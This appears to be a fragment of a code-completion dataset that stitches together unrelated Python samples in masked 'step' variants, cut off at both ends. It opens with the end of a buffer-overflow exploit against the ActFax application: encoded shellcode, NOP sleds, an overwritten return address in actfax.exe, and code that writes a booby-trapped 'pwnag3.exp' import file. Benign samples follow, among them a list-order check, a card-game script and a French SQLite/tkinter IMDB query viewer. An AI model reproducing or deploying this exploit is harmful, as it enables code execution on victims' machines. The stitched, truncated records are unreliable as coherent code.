\x55\\x51\\x58\\x50\\x4c\\x4b\\x47\"\r\n\"\\x30\\x33\\x48\\x4b\\x35\\x39\\x50\\x34\\x34\\x50\\x4a\\x33\\x31\\x4e\"\r\n\"\\x30\\x30\\x50\\x4c\\x4b\\x57\\x38\\x52\\x38\\x4c\\x4b\\x36\\x38\\x51\"\r\n\"\\x30\\x33\\x31\\x4e\\x33\\x4b\\x53\\x57\\x4c\\x57\\x39\\x4c\\x4b\\x56\"\r\n\"\\x54\\x4c\\x4b\\x53\\x31\\x48\\x56\\x36\\x51\\x4b\\x4f\\x46\\x51\\x4f\"\r\n\"\\x30\\x4e\\x4c\\x49\\x51\\x58\\x4f\\x54\\x4d\\x55\\x51\\x39\\x57\\x50\"\r\n\"\\x38\\x4b\\x50\\x32\\x55\\x5a\\x54\\x53\\x33\\x43\\x4d\\x4b\\x48\\x47\"\r\n\"\\x4b\\x33\\x4d\\x46\\x44\\x53\\x45\\x5a\\x42\\x36\\x38\\x4c\\x4b\\x30\"\r\n\"\\x58\\x47\\x54\\x45\\x51\\x49\\x43\\x45\\x36\\x4c\\x4b\\x44\\x4c\\x30\"\r\n\"\\x4b\\x4c\\x4b\\x36\\x38\\x55\\x4c\\x53\\x31\\x59\\x43\\x4c\\x4b\\x54\"\r\n\"\\x44\\x4c\\x4b\\x55\\x51\\x48\\x50\\x4c\\x49\\x31\\x54\\x47\\x54\\x36\"\r\n\"\\x44\\x51\\x4b\\x31\\x4b\\x55\\x31\\x36\\x39\\x31\\x4a\\x36\\x31\\x4b\"\r\n\"\\x4f\\x4d\\x30\\x51\\x48\\x51\\x4f\\x50\\x5a\\x4c\\x4b\\x55\\x42\\x5a\"\r\n\"\\x4b\\x4d\\x56\\x31\\x4d\\x52\\x4a\\x45\\x51\\x4c\\x4d\\x4d\\x55\\x4f\"\r\n\"\\x49\\x45\\x50\\x53\\x30\\x53\\x30\\x46\\x30\\x42\\x48\\x36\\x51\\x4c\"\r\n\"\\x4b\\x52\\x4f\\x4d\\x57\\x4b\\x4f\\x39\\x45\\x4f\\x4b\\x4a\\x50\\x4e\"\r\n\"\\x55\\x39\\x32\\x31\\x46\\x55\\x38\\x59\\x36\\x4d\\x45\\x4f\\x4d\\x4d\"\r\n\"\\x4d\\x4b\\x4f\\x58\\x55\\x57\\x4c\\x35\\x56\\x53\\x4c\\x44\\x4a\\x4d\"\r\n\"\\x50\\x4b\\x4b\\x4d\\x30\\x52\\x55\\x55\\x55\\x4f\\x4b\\x37\\x37\\x35\"\r\n\"\\x43\\x52\\x52\\x32\\x4f\\x43\\x5a\\x43\\x30\\x56\\x33\\x4b\\x4f\\x4e\"\r\n\"\\x35\\x32\\x43\\x32\\x4d\\x45\\x34\\x46\\x4e\\x35\\x35\\x43\\x48\\x45\"\r\n\"\\x35\\x33\\x30\\x41\\x41\")\r\n\r\nfrontpad = \"\\x90\" * 10 \r\neip = \"\\x22\\x1b\\x40\\x00\"\t#00401B22 RETN actfax.exe\r\nbackpad = \"\\x90\" * 6000\r\nbuff = frontpad + sc + \"\\x90\" * (502 - len(sc)) + eip + backpad\r\n\r\nf = open(\"pwnag3.exp\", \"w\")\r\nf.write(\r\n\"User Name\\tEntire User Name\\tPassword\\tAlias-Names\\tGroup\\tDirect Dialing\\tCost Account\\tPermissions\\tComments\\tUser-Defined\\t\"\r\n\"Predefined Settings\\tName 1\\tName 2\\tName 3\\tName 4\\tName 5\\tDepartment\\tAttention of\\tPhone 1\\tPhone 2\\tFax Number\\tE-Mail\\t\"\r\n\"Coverpage Non-Windows\\tOverlay Non-Windows\\tCoverpage Windows\\tOverlay Windows\\tUser-Defined\\tPrinter Settings\\tAutomatic Printing Outgoing\\t\"\r\n\"Printer Name Outgoing\\tReport Outgoing\\tAutomatic Printing Incoming\\tPrinter Name Incoming\\tReport Incoming\\tNotification Outgoing\\t\"\r\n\"Email Outgoing\\tNotification Incoming\\tEmail Incoming\\tAttach Original Message\\tUser-Defined Archive Settings\\tExport Outgoing\\t\"\r\n\"Export Incoming\\tExport-Path\\tMark as Read\\x0d\\x0a\"+buff+\"\\x0d\\x0a\")\r\nf.close()\r\n\r\n\r\n\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def play_43():
n = int(input('Enter n :'))
l = []
for i in range(n):
l.append(int(input()))
for i in range(n - 1):
for j in range(i + 1, n):
if l[i] < l[j]:
continue
return 'no'
return 'Yes'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def play_43():
n = int(input('Enter n :'))
l = []
for i in range(n):
l.append(int(input()))
for i in range(n - 1):
for j in range(i + 1, n):
if l[i] < l[j]:
continue
return 'no'
return 'Yes'
play_43()
<|reserved_special_token_1|>
def play_43():
n=int(input('Enter n :'))
l=[]
for i in range(n):
l.append(int(input()))
for i in range(n-1):
for j in range(i+1,n):
if l[i]<l[j]:
continue
return "no"
return "Yes"
play_43()
|
flexible
|
{
"blob_id": "1605396a6edb31dd6fe9238a0506f8cfeb794d07",
"index": 5568,
"step-1": "<mask token>\n",
"step-2": "def play_43():\n n = int(input('Enter n :'))\n l = []\n for i in range(n):\n l.append(int(input()))\n for i in range(n - 1):\n for j in range(i + 1, n):\n if l[i] < l[j]:\n continue\n return 'no'\n return 'Yes'\n\n\n<mask token>\n",
"step-3": "def play_43():\n n = int(input('Enter n :'))\n l = []\n for i in range(n):\n l.append(int(input()))\n for i in range(n - 1):\n for j in range(i + 1, n):\n if l[i] < l[j]:\n continue\n return 'no'\n return 'Yes'\n\n\nplay_43()\n",
"step-4": "def play_43():\n\tn=int(input('Enter n :'))\n\tl=[]\n\tfor i in range(n):\n\t\tl.append(int(input()))\n\tfor i in range(n-1):\n\t\tfor j in range(i+1,n):\n\t\t\tif l[i]<l[j]:\n\t\t\t\tcontinue\n\t\t\treturn \"no\"\n\treturn \"Yes\"\nplay_43()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
print('New game!')
deck = Deck()
deck.shuffle()
players = deck.deal()
auction = Auction(players)
auction.bid()
tricks = Tricks(auction)
tricks.play()
<|reserved_special_token_1|>
from ob import *
if __name__ == '__main__':
print('New game!')
deck = Deck()
deck.shuffle()
players = deck.deal()
auction = Auction(players)
auction.bid()
tricks = Tricks(auction)
tricks.play()
<|reserved_special_token_1|>
from ob import *
if __name__ == "__main__":
# Game starts
print('New game!')
# Deal
deck = Deck()
deck.shuffle()
players = deck.deal()
# Bid
auction = Auction(players)
auction.bid()
# Play
tricks = Tricks(auction)
tricks.play()
|
flexible
|
{
"blob_id": "06161b1f45e435d0273dd193229ad2ecfd46c625",
"index": 9002,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n print('New game!')\n deck = Deck()\n deck.shuffle()\n players = deck.deal()\n auction = Auction(players)\n auction.bid()\n tricks = Tricks(auction)\n tricks.play()\n",
"step-3": "from ob import *\nif __name__ == '__main__':\n print('New game!')\n deck = Deck()\n deck.shuffle()\n players = deck.deal()\n auction = Auction(players)\n auction.bid()\n tricks = Tricks(auction)\n tricks.play()\n",
"step-4": "from ob import *\n\nif __name__ == \"__main__\":\n # Game starts\n print('New game!')\n\n # Deal\n deck = Deck()\n deck.shuffle()\n players = deck.deal()\n\n # Bid\n auction = Auction(players)\n auction.bid()\n\n # Play\n tricks = Tricks(auction)\n tricks.play()\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def taille_plus_grande_reponse(reponses):
"""
Prend en argument une liste.
Renvoie la taille du plus grand élément de la liste.
"""
l = reponses
maxi = 0
for i in range(len(l)):
if len(str(l[i])) > maxi:
maxi = len(str(l[i]))
return maxi
<|reserved_special_token_0|>
def affichage_question(dico, texte, titre='Question'):
"""
prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.
Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.
"""
fenetre = tkinter.Tk()
fenetre.title(titre)
for i in range(len(texte)):
bouton = {}
bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico
=dico: requete(n, dico))
bouton[i].pack()
fenetre.mainloop()
<|reserved_special_token_0|>
def requete(n, dico):
"""
prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.
ne renvoie rien
"""
r = execute(n, dico)
afficher_table(execute(n, dico), dico[n][0])
<|reserved_special_token_0|>
def afficher_table(table, titre='', debut=0, fin=None):
"""
prend en argument table une liste et titre une chaine de caractère.
ne renvoie rien.
"""
if titre != '':
titre += '\n\n'
affichage(titre + texte_table(table, debut, fin), titre)
def texte_table(table, debut=0, fin=None):
"""
prend en argument table une liste.
renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.
"""
max = taille_plus_grande_reponse(table)
texte = '+' + max * '-' + '+\n'
for i in range(len(table)):
texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))
) * ' ' + '|' + '\n+' + max * '-' + '+\n'
return texte
<|reserved_special_token_0|>
def texte_en_liste(nom_requete, repertoire):
requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))
return requete.split()
<|reserved_special_token_0|>
def stocker_requete(dico, repertoire):
"""
prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.
ne renvoie rien
"""
liste = nom_element_du_repertoire(repertoire)
for i in range(len(liste)):
requete = separer_requete_et_question(liste[i], repertoire)
dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]
def afficher(dico):
"""
prend en argument un dictionnaire et renvoie ce disctionnaire.
"""
return dico
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def execute(n, dico):
"""
Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.
Renvoie une liste dont chaque élément est une réponse de la requête.
"""
l = []
import sqlite3
conn = sqlite3.connect('imdb.db')
c = conn.cursor()
c.execute(dico[n][1])
for row in c:
l.append(row)
conn.close()
return l
def taille_plus_grande_reponse(reponses):
"""
Prend en argument une liste.
Renvoie la taille du plus grand élément de la liste.
"""
l = reponses
maxi = 0
for i in range(len(l)):
if len(str(l[i])) > maxi:
maxi = len(str(l[i]))
return maxi
<|reserved_special_token_0|>
def affichage_question(dico, texte, titre='Question'):
"""
prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.
Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.
"""
fenetre = tkinter.Tk()
fenetre.title(titre)
for i in range(len(texte)):
bouton = {}
bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico
=dico: requete(n, dico))
bouton[i].pack()
fenetre.mainloop()
<|reserved_special_token_0|>
def requete(n, dico):
"""
prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.
ne renvoie rien
"""
r = execute(n, dico)
afficher_table(execute(n, dico), dico[n][0])
<|reserved_special_token_0|>
def afficher_table(table, titre='', debut=0, fin=None):
"""
prend en argument table une liste et titre une chaine de caractère.
ne renvoie rien.
"""
if titre != '':
titre += '\n\n'
affichage(titre + texte_table(table, debut, fin), titre)
def texte_table(table, debut=0, fin=None):
"""
prend en argument table une liste.
renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.
"""
max = taille_plus_grande_reponse(table)
texte = '+' + max * '-' + '+\n'
for i in range(len(table)):
texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))
) * ' ' + '|' + '\n+' + max * '-' + '+\n'
return texte
<|reserved_special_token_0|>
def texte_en_liste(nom_requete, repertoire):
requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))
return requete.split()
<|reserved_special_token_0|>
def creer_dictionnaire_vide():
"""
Ne contient aucun argument et renvoie un dictionnaire vide.
"""
dico = {}
return dico
def nom_element_du_repertoire(repertoire):
"""
prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.
renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.
"""
path = (
'C:\\Users\\Elève\\Desktop\\projet NSI\\projetsqlKilian\\projetsqlKilian\\'
+ repertoire)
nom_requete = os.listdir(path)
return nom_requete
def stocker_requete(dico, repertoire):
"""
prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.
ne renvoie rien
"""
liste = nom_element_du_repertoire(repertoire)
for i in range(len(liste)):
requete = separer_requete_et_question(liste[i], repertoire)
dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]
def afficher(dico):
"""
prend en argument un dictionnaire et renvoie ce disctionnaire.
"""
return dico
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def execute(n, dico):
"""
Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.
Renvoie une liste dont chaque élément est une réponse de la requête.
"""
l = []
import sqlite3
conn = sqlite3.connect('imdb.db')
c = conn.cursor()
c.execute(dico[n][1])
for row in c:
l.append(row)
conn.close()
return l
def taille_plus_grande_reponse(reponses):
"""
Prend en argument une liste.
Renvoie la taille du plus grand élément de la liste.
"""
l = reponses
maxi = 0
for i in range(len(l)):
if len(str(l[i])) > maxi:
maxi = len(str(l[i]))
return maxi
<|reserved_special_token_0|>
def affichage_question(dico, texte, titre='Question'):
"""
prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.
Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.
"""
fenetre = tkinter.Tk()
fenetre.title(titre)
for i in range(len(texte)):
bouton = {}
bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico
=dico: requete(n, dico))
bouton[i].pack()
fenetre.mainloop()
<|reserved_special_token_0|>
def requete(n, dico):
"""
prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.
ne renvoie rien
"""
r = execute(n, dico)
afficher_table(execute(n, dico), dico[n][0])
<|reserved_special_token_0|>
def afficher_table(table, titre='', debut=0, fin=None):
"""
prend en argument table une liste et titre une chaine de caractère.
ne renvoie rien.
"""
if titre != '':
titre += '\n\n'
affichage(titre + texte_table(table, debut, fin), titre)
def texte_table(table, debut=0, fin=None):
"""
prend en argument table une liste.
renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.
"""
max = taille_plus_grande_reponse(table)
texte = '+' + max * '-' + '+\n'
for i in range(len(table)):
texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))
) * ' ' + '|' + '\n+' + max * '-' + '+\n'
return texte
<|reserved_special_token_0|>
def fichier_txt_en_texte(fichier):
"""
prend en argument le chemin d'un fichier texte
Renvoie le contenu du fichier texte sous forme de chaîne de caractère.
"""
with open(fichier, 'r') as requete:
return requete.read()
def chemin(nom, repertoire):
"""
Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.
Renvoie le chemin de la requête.
"""
return repertoire + '/' + nom
def texte_en_liste(nom_requete, repertoire):
requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))
return requete.split()
<|reserved_special_token_0|>
def creer_dictionnaire_vide():
"""
Ne contient aucun argument et renvoie un dictionnaire vide.
"""
dico = {}
return dico
def nom_element_du_repertoire(repertoire):
"""
prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.
renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.
"""
path = (
'C:\\Users\\Elève\\Desktop\\projet NSI\\projetsqlKilian\\projetsqlKilian\\'
+ repertoire)
nom_requete = os.listdir(path)
return nom_requete
def stocker_requete(dico, repertoire):
"""
prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.
ne renvoie rien
"""
liste = nom_element_du_repertoire(repertoire)
for i in range(len(liste)):
requete = separer_requete_et_question(liste[i], repertoire)
dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]
def afficher(dico):
"""
prend en argument un dictionnaire et renvoie ce disctionnaire.
"""
return dico
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def execute(n, dico):
"""
Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.
Renvoie une liste dont chaque élément est une réponse de la requête.
"""
l = []
import sqlite3
conn = sqlite3.connect('imdb.db')
c = conn.cursor()
c.execute(dico[n][1])
for row in c:
l.append(row)
conn.close()
return l
def taille_plus_grande_reponse(reponses):
"""
Prend en argument une liste.
Renvoie la taille du plus grand élément de la liste.
"""
l = reponses
maxi = 0
for i in range(len(l)):
if len(str(l[i])) > maxi:
maxi = len(str(l[i]))
return maxi
<|reserved_special_token_0|>
def affichage_question(dico, texte, titre='Question'):
"""
prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.
Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.
"""
fenetre = tkinter.Tk()
fenetre.title(titre)
for i in range(len(texte)):
bouton = {}
bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico
=dico: requete(n, dico))
bouton[i].pack()
fenetre.mainloop()
<|reserved_special_token_0|>
def requete(n, dico):
"""
prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.
ne renvoie rien
"""
r = execute(n, dico)
afficher_table(execute(n, dico), dico[n][0])
<|reserved_special_token_0|>
def afficher_table(table, titre='', debut=0, fin=None):
"""
prend en argument table une liste et titre une chaine de caractère.
ne renvoie rien.
"""
if titre != '':
titre += '\n\n'
affichage(titre + texte_table(table, debut, fin), titre)
def texte_table(table, debut=0, fin=None):
"""
prend en argument table une liste.
renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.
"""
max = taille_plus_grande_reponse(table)
texte = '+' + max * '-' + '+\n'
for i in range(len(table)):
texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))
) * ' ' + '|' + '\n+' + max * '-' + '+\n'
return texte
<|reserved_special_token_0|>
def fichier_txt_en_texte(fichier):
"""
prend en argument le chemin d'un fichier texte
Renvoie le contenu du fichier texte sous forme de chaîne de caractère.
"""
with open(fichier, 'r') as requete:
return requete.read()
def chemin(nom, repertoire):
"""
Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.
Renvoie le chemin de la requête.
"""
return repertoire + '/' + nom
def texte_en_liste(nom_requete, repertoire):
requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))
return requete.split()
def liste_en_texte(liste):
"""
prend en argument une liste et un indice et renvoie la même liste mais l'élement d'indice 'n' est transformé en texte.
"""
texte = ''
for i in range(len(liste)):
texte = texte + str(liste[i]) + ' '
return texte
<|reserved_special_token_0|>
def creer_dictionnaire_vide():
"""
Ne contient aucun argument et renvoie un dictionnaire vide.
"""
dico = {}
return dico
def nom_element_du_repertoire(repertoire):
"""
prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.
renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.
"""
path = (
'C:\\Users\\Elève\\Desktop\\projet NSI\\projetsqlKilian\\projetsqlKilian\\'
+ repertoire)
nom_requete = os.listdir(path)
return nom_requete
def stocker_requete(dico, repertoire):
"""
prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.
ne renvoie rien
"""
liste = nom_element_du_repertoire(repertoire)
for i in range(len(liste)):
requete = separer_requete_et_question(liste[i], repertoire)
dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]
def afficher(dico):
"""
prend en argument un dictionnaire et renvoie ce disctionnaire.
"""
return dico
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def execute(n,dico):
"""
Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.
Renvoie une liste dont chaque élément est une réponse de la requête.
"""
l = []
import sqlite3
conn = sqlite3.connect('imdb.db')
c = conn.cursor()
c.execute(dico[n][1])
for row in c:
l.append(row)
conn.close()
return l
def taille_plus_grande_reponse(reponses):
"""
Prend en argument une liste.
Renvoie la taille du plus grand élément de la liste.
"""
l = reponses
maxi = 0
for i in range(len(l)):
if len(str(l[i])) > maxi:
maxi = len(str(l[i]))
return maxi
"""affichage question"""""""""""""""""""""""""""
from tkinter import *
def question(dico):
"""
prend en argument un disctionnaire.
Ne renvoie rien.
"""
l = []
for i in range(len(dico)):
l.append(dico[i][0])
affichage_question(dico,l)
def affichage_question(dico, texte, titre = "Question"):
"""
prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.
Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.
"""
fenetre = tkinter.Tk()
fenetre.title(titre)
for i in range(len(texte)):
bouton={}
bouton[i]=Button(fenetre, text=texte[i], command=lambda n=i, dico=dico:requete(n,dico))
bouton[i].pack()
fenetre.mainloop()
""""""""""""""""""""""""""""""""""""""""""""""""
def requete(n,dico):
"""
prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.
ne renvoie rien
"""
r = execute(n,dico)
afficher_table(execute(n,dico),dico[n][0])
import tkinter
import os
def afficher_table(table, titre ="", debut = 0, fin = None):
"""
prend en argument table une liste et titre une chaine de caractère.
ne renvoie rien.
"""
if titre != "":
titre += "\n\n"
#print(titre + texte_table(table, debut, fin))
affichage(titre + texte_table(table, debut, fin), titre)
def texte_table(table, debut = 0, fin = None):
"""
prend en argument table une liste.
renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.
"""
max = taille_plus_grande_reponse(table)
texte = '+' + max * '-' + '+\n'
for i in range(len(table)):
texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))) * ' ' + '|' + '\n+' + max * '-' + '+\n'
return texte
def affichage(texte, titre = "Requêtes tables"):
"""
prend en argument texte une chaîne de caractère et titre une chaine de caractère
renvoie une fenêtre tkinter
"""
root = tkinter.Tk()
root.title(str(titre))
RWidth=root.winfo_screenwidth() - 100
RHeight=root.winfo_screenheight() - 100
root.geometry("%dx%d+50+0"%(RWidth, RHeight))
text=tkinter.Text(root, wrap = 'none')
scroll_x=tkinter.Scrollbar(text.master, orient='horizontal', command = text.xview)
scroll_x.config(command = text.xview)
text.configure(xscrollcommand = scroll_x.set)
scroll_x.pack(side = 'bottom', fill = 'x', anchor = 'w')
scroll_y = tkinter.Scrollbar(text.master)
scroll_y.config(command = text.yview)
text.configure(yscrollcommand = scroll_y.set)
scroll_y.pack(side = tkinter.RIGHT, fill = 'y')
text.insert("1.0", texte)
text.pack(side = tkinter.LEFT, expand = True, fill = tkinter.BOTH)
root.mainloop()
def fichier_txt_en_texte(fichier):
"""
prend en argument le chemin d'un fichier texte
Renvoie le contenu du fichier texte sous forme de chaîne de caractère.
"""
with open(fichier, "r") as requete:
return requete.read()
def chemin(nom, repertoire):
"""
Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.
Renvoie le chemin de la requête.
"""
return repertoire + '/' + nom
def texte_en_liste(nom_requete, repertoire):
requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))
return requete.split()
def liste_en_texte(liste):
"""
prend en argument une liste et un indice et renvoie la même liste mais l'élement d'indice 'n' est transformé en texte.
"""
texte = ""
for i in range(len(liste)):
texte = texte + str(liste[i]) + " "
return texte
def separer_requete_et_question(nom, repertoire):
"""
prend en argument le numéro de la requête et renvoie la question et la requête sésparé.
"""
requete = texte_en_liste(nom, repertoire) #transforme la requête en tableau
question = ""
for i in range(len(requete)): #cherche le moment où la question s'arrête et sépare la question de la requête
if requete[i] == "?":
question = requete[0:i+1] #stock la question
requete = requete[i+1:len(requete)] #stock la réponse
break #stop la boucle quand la "?" est trouvé
return [liste_en_texte(question),liste_en_texte(requete)]
def creer_dictionnaire_vide():
"""
Ne contient aucun argument et renvoie un dictionnaire vide.
"""
dico = {}
return dico
def nom_element_du_repertoire(repertoire):
"""
prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.
renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.
"""
path = "C:\\Users\\Elève\\Desktop\\projet NSI\\projetsqlKilian\\projetsqlKilian\\" + repertoire
nom_requete = os.listdir(path)
return nom_requete
def stocker_requete(dico, repertoire):
"""
prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.
ne renvoie rien
"""
liste = nom_element_du_repertoire(repertoire)
for i in range(len(liste)):
requete = separer_requete_et_question(liste[i], repertoire)
dico[i] = ['#' + str(i+1) + ') ' + requete[0], requete[1]]
def afficher(dico):
"""
prend en argument un dictionnaire et renvoie ce disctionnaire.
"""
return dico
a = creer_dictionnaire_vide()
stocker_requete(a,'requête')
#print(afficher(a))
question(a)
#print(nom_element_du_repertoire('requête'))
#requete(a)
#print(execute(1,a))
#print(taille_plus_grande_reponse(execute(1,a)))
|
flexible
|
{
"blob_id": "7618d7fde3774a04ac2005dad104e54b9988d3e8",
"index": 9487,
"step-1": "<mask token>\n\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\n<mask token>\n\n\ndef affichage_question(dico, texte, titre='Question'):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton = {}\n bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico\n =dico: requete(n, dico))\n bouton[i].pack()\n fenetre.mainloop()\n\n\n<mask token>\n\n\ndef requete(n, dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n, dico)\n afficher_table(execute(n, dico), dico[n][0])\n\n\n<mask token>\n\n\ndef afficher_table(table, titre='', debut=0, fin=None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != '':\n titre += '\\n\\n'\n affichage(titre + texte_table(table, debut, fin), titre)\n\n\ndef texte_table(table, debut=0, fin=None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))\n ) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\n\n<mask token>\n\n\ndef texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\n\n<mask token>\n\n\ndef stocker_requete(dico, repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]\n\n\ndef afficher(dico):\n \"\"\"\n prend en argument un dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\n\n<mask token>\n",
"step-2": "def execute(n, dico):\n \"\"\"\n Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.\n Renvoie une liste dont chaque élément est une réponse de la requête.\n \"\"\"\n l = []\n import sqlite3\n conn = sqlite3.connect('imdb.db')\n c = conn.cursor()\n c.execute(dico[n][1])\n for row in c:\n l.append(row)\n conn.close()\n return l\n\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\n<mask token>\n\n\ndef affichage_question(dico, texte, titre='Question'):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton = {}\n bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico\n =dico: requete(n, dico))\n bouton[i].pack()\n fenetre.mainloop()\n\n\n<mask token>\n\n\ndef requete(n, dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n, dico)\n afficher_table(execute(n, dico), dico[n][0])\n\n\n<mask token>\n\n\ndef afficher_table(table, titre='', debut=0, fin=None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != '':\n titre += '\\n\\n'\n affichage(titre + texte_table(table, debut, fin), titre)\n\n\ndef texte_table(table, debut=0, fin=None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))\n ) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\n\n<mask token>\n\n\ndef texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\n\n<mask token>\n\n\ndef creer_dictionnaire_vide():\n \"\"\"\n Ne contient aucun argument et renvoie un dictionnaire vide.\n \"\"\"\n dico = {}\n return dico\n\n\ndef nom_element_du_repertoire(repertoire):\n \"\"\"\n prend en argument le nom d'un 